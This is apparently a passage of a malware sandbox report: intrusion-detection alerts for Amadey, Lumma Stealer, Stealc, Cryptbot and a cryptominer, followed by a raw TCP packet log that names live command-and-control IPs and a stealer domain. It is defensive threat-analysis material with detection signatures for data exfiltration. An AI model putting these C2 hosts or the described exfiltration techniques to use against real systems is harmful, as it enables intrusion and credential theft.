                                                                                                                                                                                              2024-12-16T01:03:09.549098+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.450058185.215.113.4380TCP
                                                                                                                                                                                              2024-12-16T01:03:12.398640+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.450065104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:03:12.398640+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450065104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:03:13.495944+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450065104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:03:16.080592+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.450073185.215.113.1680TCP
                                                                                                                                                                                              2024-12-16T01:03:22.139362+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450086172.67.177.250443TCP
                                                                                                                                                                                              2024-12-16T01:03:23.060525+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.450062185.215.113.20680TCP
                                                                                                                                                                                              2024-12-16T01:03:23.227098+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.450086172.67.177.250443TCP
                                                                                                                                                                                              2024-12-16T01:03:23.227098+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450086172.67.177.250443TCP
                                                                                                                                                                                              2024-12-16T01:03:27.397068+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.450077TCP
                                                                                                                                                                                              2024-12-16T01:03:27.643638+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.450062185.215.113.20680TCP
                                                                                                                                                                                              2024-12-16T01:03:28.754173+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.450094185.215.113.4380TCP
                                                                                                                                                                                              2024-12-16T01:03:29.482324+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.450100104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:03:29.482324+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450100104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:03:30.670644+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.450062185.215.113.20680TCP
                                                                                                                                                                                              2024-12-16T01:03:33.210106+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.450104104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:03:33.210106+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450104104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:03:34.576840+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.450062185.215.113.20680TCP
                                                                                                                                                                                              2024-12-16T01:03:35.457368+01002051004ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request2192.168.2.450109154.216.20.243443TCP
                                                                                                                                                                                              2024-12-16T01:03:38.308914+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.450112104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:03:38.308914+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450112104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:03:42.168743+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.450115185.215.113.20680TCP
                                                                                                                                                                                              2024-12-16T01:03:42.776243+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.450117104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:03:42.776243+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450117104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:03:44.132165+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.450117104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:03:45.200321+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.450115185.215.113.20680TCP
                                                                                                                                                                                              2024-12-16T01:03:53.697968+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450123172.67.177.250443TCP
                                                                                                                                                                                              2024-12-16T01:03:55.020370+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.450123172.67.177.250443TCP
                                                                                                                                                                                              2024-12-16T01:03:55.020370+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450123172.67.177.250443TCP
                                                                                                                                                                                              2024-12-16T01:03:58.443813+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.450127185.215.113.1680TCP
                                                                                                                                                                                              2024-12-16T01:04:00.465063+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450129172.67.177.250443TCP
                                                                                                                                                                                              2024-12-16T01:04:02.203061+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.450124TCP
                                                                                                                                                                                              2024-12-16T01:04:03.548159+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.450130185.215.113.4380TCP
                                                                                                                                                                                              2024-12-16T01:04:04.440045+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450131172.67.177.250443TCP
                                                                                                                                                                                              2024-12-16T01:04:05.802809+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.450131172.67.177.250443TCP
                                                                                                                                                                                              2024-12-16T01:04:09.054592+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450134172.67.177.250443TCP
                                                                                                                                                                                              2024-12-16T01:04:09.782778+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.450136104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:04:09.782778+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450136104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:04:10.020893+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.450136104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:04:13.344518+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450138172.67.177.250443TCP
                                                                                                                                                                                              2024-12-16T01:04:15.112408+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.450139104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:04:15.112408+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450139104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:04:16.422850+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450139104.21.50.161443TCP
                                                                                                                                                                                              2024-12-16T01:04:19.138082+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.450142185.215.113.1680TCP
                                                                                                                                                                                              2024-12-16T01:04:20.572387+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.450141185.215.113.20680TCP
                                                                                                                                                                                              2024-12-16T01:04:27.892302+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450145172.67.177.250443TCP
                                                                                                                                                                                              2024-12-16T01:04:28.892649+01002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.450146141.8.192.14180TCP
                                                                                                                                                                                              2024-12-16T01:04:31.275511+01002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.450149141.8.192.14180TCP
                                                                                                                                                                                              2024-12-16T01:04:32.785842+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.450148185.215.113.20680TCP
                                                                                                                                                                                              2024-12-16T01:04:33.425988+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450153172.67.177.250443TCP
                                                                                                                                                                                              2024-12-16T01:04:34.109544+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450155104.21.79.7443TCP
                                                                                                                                                                                              2024-12-16T01:04:34.492848+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450153172.67.177.250443TCP
                                                                                                                                                                                              2024-12-16T01:04:35.129480+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.450155104.21.79.7443TCP
                                                                                                                                                                                              2024-12-16T01:04:35.129480+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450155104.21.79.7443TCP
                                                                                                                                                                                              2024-12-16T01:04:36.328082+01002051004ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request2192.168.2.450156154.216.20.243443TCP
                                                                                                                                                                                              2024-12-16T01:04:45.736837+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450168104.21.79.7443TCP
                                                                                                                                                                                              2024-12-16T01:04:46.478746+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.450168104.21.79.7443TCP
                                                                                                                                                                                              2024-12-16T01:04:46.478746+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450168104.21.79.7443TCP

                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                              Dec 16, 2024 01:01:05.054790020 CET4975880192.168.2.4185.215.113.43
                                                                                                                                                                                              Dec 16, 2024 01:01:05.174813032 CET8049758185.215.113.43192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:05.175081968 CET4975880192.168.2.4185.215.113.43
                                                                                                                                                                                              Dec 16, 2024 01:01:05.175170898 CET4975880192.168.2.4185.215.113.43
                                                                                                                                                                                              Dec 16, 2024 01:01:05.294989109 CET8049758185.215.113.43192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:06.506673098 CET8049758185.215.113.43192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:06.506988049 CET4975880192.168.2.4185.215.113.43
                                                                                                                                                                                              Dec 16, 2024 01:01:08.022552967 CET4975880192.168.2.4185.215.113.43
                                                                                                                                                                                              Dec 16, 2024 01:01:08.022876024 CET4976480192.168.2.4185.215.113.43
                                                                                                                                                                                              Dec 16, 2024 01:01:08.142596960 CET8049764185.215.113.43192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:08.142707109 CET8049758185.215.113.43192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:08.142776966 CET4975880192.168.2.4185.215.113.43
                                                                                                                                                                                              Dec 16, 2024 01:01:08.142826080 CET4976480192.168.2.4185.215.113.43
                                                                                                                                                                                              Dec 16, 2024 01:01:08.142946005 CET4976480192.168.2.4185.215.113.43
                                                                                                                                                                                              Dec 16, 2024 01:01:08.262624979 CET8049764185.215.113.43192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:09.508728027 CET8049764185.215.113.43192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:09.508785963 CET8049764185.215.113.43192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:09.508811951 CET4976480192.168.2.4185.215.113.43
                                                                                                                                                                                              Dec 16, 2024 01:01:09.508842945 CET4976480192.168.2.4185.215.113.43
                                                                                                                                                                                              Dec 16, 2024 01:01:09.512542009 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:09.632786989 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:09.632992983 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:09.633111954 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:09.753382921 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:10.957385063 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:10.957444906 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:10.957463026 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:10.957739115 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:10.957743883 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:10.957791090 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:10.957803965 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:10.958031893 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:10.958034039 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:10.958067894 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:10.958096027 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:10.958120108 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:10.958123922 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:10.958153009 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:10.958174944 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:10.958195925 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:10.958204031 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:10.958249092 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.077704906 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.077742100 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.077759027 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.077799082 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.081733942 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.081785917 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.149514914 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.149553061 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.149694920 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.149694920 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.153723955 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.153891087 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.153973103 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.154128075 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.162187099 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.162220001 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.162481070 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.170608997 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.170643091 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.170768976 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.170768976 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.179097891 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.179132938 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.179153919 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.179191113 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.187653065 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.187685966 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.187788010 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.187788010 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.196011066 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.196044922 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.196155071 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.196155071 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.204277039 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.204385042 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.204438925 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.204438925 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.212909937 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.212943077 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.213100910 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.213100910 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.221296072 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.221329927 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.221447945 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.221447945 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.229773045 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.229805946 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.229937077 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.229937077 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.269597054 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.269630909 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.269824028 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.341576099 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.341610909 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.341628075 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.341653109 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.343960047 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.344010115 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.344012022 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.344053984 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.348684072 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.348717928 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.348732948 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.348759890 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.353394985 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.353441954 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.353446960 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.353493929 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.358131886 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.358165979 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.358190060 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.358215094 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.363190889 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.363240957 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.363287926 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.363287926 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.367552042 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.367614031 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.367639065 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.367690086 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.372417927 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.372471094 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.372631073 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.372631073 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.377300978 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.377355099 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.377444029 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.377444029 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.381946087 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.382000923 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.382112980 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.382112980 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.386537075 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.386662960 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.386707067 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.386708021 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.391082048 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.391155005 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.391185045 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.391237974 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.396147966 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.396203995 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.396357059 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.396357059 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.400892973 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.400945902 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.400981903 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.401261091 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.404225111 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.404320955 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.404628038 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.404772997 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.408164978 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.408221006 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.408227921 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.408273935 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.411911011 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.411962986 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.412116051 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.412116051 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.415281057 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.415340900 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.415365934 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.415424109 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.418992043 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.419045925 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:11.419141054 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:11.419141054 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:12.801933050 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:12.801975965 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:12.802112103 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:12.824513912 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:12.824538946 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:13.585072041 CET4976480192.168.2.4185.215.113.43
                                                                                                                                                                                              Dec 16, 2024 01:01:13.585206032 CET4978280192.168.2.4185.215.113.43
                                                                                                                                                                                              Dec 16, 2024 01:01:13.706161022 CET8049782185.215.113.43192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:13.706221104 CET8049764185.215.113.43192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:13.706341028 CET4978280192.168.2.4185.215.113.43
                                                                                                                                                                                              Dec 16, 2024 01:01:13.706347942 CET4976480192.168.2.4185.215.113.43
                                                                                                                                                                                              Dec 16, 2024 01:01:13.706434965 CET4978280192.168.2.4185.215.113.43
                                                                                                                                                                                              Dec 16, 2024 01:01:13.826476097 CET8049782185.215.113.43192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:14.304953098 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:14.305042982 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:14.309920073 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:14.309947014 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:14.310369968 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:14.350128889 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:14.427233934 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:14.467376947 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:14.974988937 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:14.975061893 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:14.975083113 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:14.975203037 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:14.975260019 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:14.975296974 CET49776443192.168.2.4154.216.20.243
